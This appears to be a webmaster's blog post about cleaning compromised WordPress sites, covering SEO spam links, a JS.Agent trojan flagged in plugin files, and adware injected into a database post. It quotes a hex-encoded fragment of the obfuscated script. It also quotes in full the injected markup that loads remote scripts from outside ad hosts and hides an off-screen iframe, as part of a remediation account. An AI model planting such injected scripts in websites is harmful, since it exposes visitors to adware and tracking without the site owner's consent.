What is SEO poisoning?

I found the following article that introduced me to the term “SEO poisoning.”

http://www.scmagazine.com/attackers-use-seo-spam-to-improve-the-rankings-of-their-websites-on-google-and-other-search-engines/article/375339/

I was considering this Cross-Site Scripting, but the code wasn’t malicious is was just leading back to another site selling their services. The term SEO poisoning makes more sense. The goal of this poisoning is to increase the rankings of the company performing the action by embedding links into a legitimate site and linking back to their site. Link backs are part of the matrix Google uses to rank your site.

The links are often displayed off screen so webmasters are usually unaware of the poisoning even happening. Fortunately some of the writers of the plugins are aware of this technique are incorporating tools into their plugins.

WordPress site blocked by SonicWall – JS.Agent.NKW_2 (Trojan)

Had a customer’s website blocked by our internal firewall.

dr_blum_homepage_blocked_infection_small

They were running WP Antivirus Site Protection plug-in. It listed the following files.

  • /wp-content/plugins/nextgen-gallery/nggallery.php
    /wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/ngglegacy/lib/imagemagick.inc.php
    /wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/router/class.router.php
    /wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/router/class.routing_app.php
    /wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/router/interface.routing_app.php
    /wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/wordpress_routing/adapter.wordpress_routing_app.php
    /wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/ngglegacy/admin/functions.php
    /wp-content/plugins/si-contact-form/includes/class-fscf-process.php

 

This link provided me with some detail. There was a code that looked like “\x73\x63\x5F\x63\x6F”,\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64″,\x63\x6F\x6C\x6F\x72\x44\x65\x70\x74\x68″,\x77\x69\x64\x74\x68″,\x68\x65\x69\x67\x68\x74″,\x63\x68\x61\x72\x73\x65\x74″,\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,\x72\x65\x66\x65\x72\x72\x65\x72″,

Deleting this out is supposed to help.

https://wordpress.org/support/topic/jsagent-warnings-in-avg-nightmare-hack-in-multiple-wordpress-sites

Here is a good article on this issue.

http://blog.sucuri.net/2012/12/website-malware-sharp-increase-in-spam-attacks-wordpress-joomla.html

 

 

WordPress site infected with CouponDropDown Adware

Customers WordPress site got hacked. They use Network Solutions as their host. Network Solutions took their site offline. We had to delete all the WordPress files, upload a clean version, and put their content and theme back. After that the site was back up and running.

I reviewed the site to make sure the permalinks didn’t cause a problem. On one page there were banners ads showing up.

lawyer_website_xxs

The issue turned out to be a form Cross Site Scripting or SEO poisoning. There was a database entry that had the extra text in it. Here is the text below.

————————————————————————————————–

<div id=”__tbSetup”></div>

<script type=”text/javascript” src=”http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&amp;pid=1032&amp;zoneid=62862″></script><script type=”text/javascript” src=”https://loading-resource.com/data.js.php?i={6C425871-ABD5-4124-A2B2-C02CE1D37F67}&amp;d=2013-1-17&amp;s=http://mcmanus-darden.com/home/wp-admin/post.php?post=361&amp;action=edit”></script><script id=”__changoScript” type=”text/javascript”>// <![CDATA[

var __chd__ = {‘aid’:11079,’chaid’:’www_objectify_ca’};(function() { var c = document.createElement(‘script’); c.type = ‘text/javascript’; c.async = true;c.src = ( ‘https:’ == document.location.protocol ? ‘https://z’: ‘http://p’) + ‘.chango.com/static/c.js’; var s = document.getElementsByTagName(‘script’)[0];s.parentNode.insertBefore(c, s);})();

// ]]></script><script id=”__simpliScript” type=”text/javascript” src=”http://i.simpli.fi/dpx.js?cid=3065&amp;m=1″ data-sifi-parsed=”true”></script><script type=”text/javascript” src=”http://www.superfish.com/ws/sf_main.jsp?dlsource=wjfudcm&amp;userId=ezZDNDI1ODcxLUFCRDUtND&amp;CTID=default-US”></script><script type=”text/javascript” src=”http://www.vitruvianleads.com/build/production/selectionlinks/templates/bootstrap.js”></script><script type=”text/javascript” src=”http://i.simpli.fi/p?cid=3065&amp;cb=dpx_48652254532._hp”></script><iframe id=”l3adg3n-xdm” style=”position: absolute; top: -1000px; left: -1000px; width: 1px; height: 1px;” src=”http://www.vitruvianleads.com/build/xdm.html” width=”320″ height=”240″></iframe>

————————————————————————————————–

There were multiple entries under this title. I used the source to figure out the actual page is was effecting. It was entry 361. There were approximately 20 revisions, but it was the original 361 that took the script off the site. It was in some revisions but not all.

I hope this helps someone else….